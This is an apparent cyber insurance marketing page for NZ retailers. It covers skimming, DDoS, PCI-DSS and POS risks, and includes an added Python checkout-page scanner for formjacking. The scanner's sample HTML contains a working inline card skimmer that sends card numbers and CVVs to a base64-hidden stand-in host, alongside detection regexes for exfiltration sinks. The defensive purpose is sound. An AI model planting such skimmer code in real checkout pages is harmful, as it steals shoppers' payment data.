
Cyber Insurance for Retail & eCommerce

Retail businesses and online stores process payment card data, customer accounts and purchase histories at scale.

Industry Insight

A DDoS attack on a NZ eCommerce site during peak season can cost tens of thousands per day in lost sales.

Why Retail Businesses Need Cyber Insurance

Retail and eCommerce businesses process thousands of payment transactions and hold large databases of customer data. PCI-DSS obligations, Privacy Act compliance and reputational risk make cyber insurance essential. Website skimming attacks and point-of-sale breaches are common vectors.

Top Cyber Risks for Retail Businesses

  • Payment card data theft
  • Website skimming attacks
  • Customer database breach
  • DDoS attacks disrupting sales
  • Supply chain / third-party breaches

Recommended Coverage for Retail Businesses

✓ PCI-DSS liability
✓ Customer data breach response
✓ Business interruption
✓ Website restoration
✓ Third-party notification costs

Typical Premium Range

$80–$250/month

Premiums vary based on revenue, data held, security controls in place, and coverage limits selected. Our brokers will find the best rate for your specific profile from multiple insurers.

Cyber Threats Facing NZ Retail and eCommerce

Retail and eCommerce businesses in New Zealand face a broad and growing range of cyber threats. Every transaction processed, every customer account created, and every marketing database maintained represents potential cyber exposure. The volume of customer data held by even a small online retailer (addresses, purchase histories, email addresses and, where card data is not tokenised by the payment gateway, payment card details) makes retail one of the most frequently targeted sectors for data theft.

The stakes are particularly high for eCommerce businesses because a significant breach can cause a near-immediate loss of customer trust, with revenue impacts that persist long after the technical incident is resolved. In the interconnected world of online retail, news of a breach spreads rapidly through social media and review platforms.

Website Skimming: The Hidden Threat

One of the most insidious threats to eCommerce businesses is website skimming: malicious code injected into checkout pages that captures payment card details as customers enter them. This attack vector, also known as formjacking, is difficult to detect because the website continues to function normally while the criminal harvests card data in real time. The injected code usually arrives through a compromised admin account, a vulnerable theme or plugin, or a compromised third-party script that the checkout page already loads. Skimming attacks have affected thousands of eCommerce sites globally, including many operated by small and medium NZ businesses using popular platforms like WooCommerce and Shopify.

Businesses that suffer skimming attacks face PCI-DSS liability for card brand assessments, costs to identify and remove the malicious code, breach notification obligations to affected customers, and potential liability claims from card holders whose details were stolen.
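The practical check behind the skimming section above is a script inventory: a checkout page should load a small, known set of scripts, and a skimmer shows up either as a script from an origin you never approved or as an inline script that reads the card fields and sends them somewhere. The following Python scan is an added example, not code from CyberCover or from WooCommerce, Shopify or any other platform. It assumes a hypothetical allowlist of script origins (`https://cdn.example-shop.test`) and runs over a constructed checkout page that contains one injected loader and one inline skimmer; the indicator patterns are heuristics for triage, not a substitute for a PCI forensic investigation.

```python
"""Script-inventory check for a checkout page (formjacking triage).

Added example, not code from CyberCover or from any eCommerce platform.
It assumes you keep a baseline of the script origins your checkout page
legitimately loads, and it scans a saved copy of the page (here a constructed
HTML sample) for two things skimmers usually introduce:
  1. an external <script src> from an origin not in the baseline, and
  2. an inline script that reads card fields and also shows an exfiltration
     or obfuscation signal.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical baseline: the only third-party origin this shop expects.
ALLOWED_SCRIPT_ORIGINS = {"https://cdn.example-shop.test"}

# Constructed sample page: one legitimate script, one injected loader from an
# unknown CDN, and one inline skimmer that reads the card fields and sends
# them to a base64-hidden URL via an image request.
SAMPLE_CHECKOUT_HTML = """<html><head>
<script src="https://cdn.example-shop.test/checkout.js"></script>
<script src="https://static-analytics-cdn.test/track.js"></script>
</head><body>
<form id="checkout"><input name="cardNumber"><input name="cvv"></form>
<script>
document.getElementById("checkout").addEventListener("submit", function () {
  var d = document.querySelector("[name=cardNumber]").value + "|" +
          document.querySelector("[name=cvv]").value;
  new Image().src = atob("aHR0cHM6Ly9leGZpbC50ZXN0L2c/") + btoa(d);
});
</script>
</body></html>"""

# Heuristic indicators. A card-field read alone is normal on a checkout page;
# it becomes suspicious when paired with obfuscation or an exfiltration sink.
CARD_READ = re.compile(r"(card|cvv|cvc|expir)[^;\n]{0,40}\.value", re.I)
OBFUSCATION = re.compile(r"atob\(|String\.fromCharCode|unescape\(|eval\(")
EXFIL_SINK = re.compile(r"new Image\(|\.sendBeacon\(|fetch\(|XMLHttpRequest")


class _ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self._in_inline = False
            self.inline.append("".join(self._buf))


def scan_checkout_page(html, allowed_origins):
    """Return a list of findings; an empty list means nothing unexpected."""
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for src in collector.external:
        parsed = urlparse(src)
        if not parsed.netloc:          # relative URL: served by the shop itself
            continue
        origin = f"{parsed.scheme}://{parsed.netloc}"
        if origin not in allowed_origins:
            findings.append({"kind": "unexpected-script-origin", "detail": src})
    for index, body in enumerate(collector.inline):
        if not CARD_READ.search(body):
            continue
        signals = [name for name, rx in (("obfuscation", OBFUSCATION),
                                         ("exfil-sink", EXFIL_SINK)) if rx.search(body)]
        if signals:
            findings.append({"kind": "inline-skimmer-indicators",
                             "detail": f"inline script #{index}: card-field read + {', '.join(signals)}"})
    return findings


def csp_script_src(allowed_origins):
    """Build the script-src directive that would block the injected loader."""
    return "script-src 'self' " + " ".join(sorted(allowed_origins))


if __name__ == "__main__":
    for finding in scan_checkout_page(SAMPLE_CHECKOUT_HTML, ALLOWED_SCRIPT_ORIGINS):
        print(finding["kind"], "->", finding["detail"])
    print("Content-Security-Policy:", csp_script_src(ALLOWED_SCRIPT_ORIGINS))
```

Run against the sample, the scan reports the unknown `static-analytics-cdn.test` loader and the inline skimmer (card-field read plus `atob(` and `new Image(`). Scheduling such a scan against a fetched copy of the live checkout page, and serving the generated `Content-Security-Policy` script-src directive, turns the allowlist into both a detection and a prevention control; a skimmer that is loaded from an origin outside the list is blocked by the browser before it can run.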

DDoS Attacks: Taking Your Store Offline

Distributed denial of service (DDoS) attacks overwhelm your website with fake traffic, making it inaccessible to genuine customers. For eCommerce businesses, a DDoS attack during peak trading periods (Christmas, Black Friday, or a major promotional campaign) can result in thousands of dollars per hour in lost sales. Competitors and extortionists sometimes use DDoS attacks strategically to cause maximum business disruption.

PCI-DSS Compliance and Cyber Insurance

Any business that processes, stores or transmits payment card data must comply with the Payment Card Industry Data Security Standard (PCI-DSS). A breach that exposes card data triggers a mandatory PCI forensic investigation, potential card brand fines and assessments, and the cost of card replacement for affected customers. Cyber insurance specifically addresses PCI-DSS liability, covering these fines and assessment costs where they are insurable.

Point-of-Sale System Attacks

Physical retail businesses face additional threats from point-of-sale (POS) system compromises. Malware installed on networked POS or EFTPOS systems can capture card data in real time across multiple locations simultaneously. NZ Police and CERT NZ have reported increasing incidents of POS malware, particularly targeting hospitality and retail businesses that use networked EFTPOS systems.

Retail Cyber Insurance Coverage

A comprehensive retail cyber insurance policy covers: customer data breach response and notification, PCI-DSS liability and card brand fines, business interruption losses during website downtime, DDoS attack response, website restoration and code forensics, third-party claims from customers, and supply chain or third-party platform breach costs. Given the interconnected nature of retail systems (payment processors, fulfilment platforms, marketing tools), ensuring your policy addresses third-party and supply chain risk is particularly important.


Written by the CyberCover Advisory Team

Licensed NZ insurance advisors specialising in cyber risk for New Zealand businesses. All content reviewed for accuracy and NZ regulatory compliance.

Last updated: May 2026

Frequently Asked Questions

Does cyber insurance cover PCI-DSS fines after a card breach?

Yes, many cyber insurance policies include PCI-DSS liability cover, which responds to card brand fines and assessment costs following a payment card breach. Confirm this is explicitly included when comparing policies; it is a standard inclusion in specialist retail cyber policies.

Am I covered for a breach of my eCommerce platform (e.g., Shopify or WooCommerce)?

If a breach occurs through your eCommerce platform, whether through a vulnerability in your theme, a plugin, or a credentials attack, your cyber insurance will typically respond to the resulting breach costs. Coverage for losses caused by the platform provider's own infrastructure failure may require separate coverage.

Does cyber insurance cover lost sales during a DDoS attack?

Yes. Business interruption cover within a cyber insurance policy compensates for revenue lost during a covered cyber event, including DDoS attacks that make your website inaccessible to customers. Most policies have a waiting period (often 8 hours) before business interruption cover activates.

What should I do immediately if I suspect my site has been skimmed?

Immediately engage your cyber insurance incident response team, available 24/7. They will coordinate forensic investigation, assist with removing malicious code, advise on breach notification obligations, and manage PCI-DSS liability. Do not attempt to investigate alone, as this can compromise forensic evidence: in particular, do not delete the injected code, restore from backup or redeploy the site before the investigators have captured the compromised pages, server logs and admin access records.
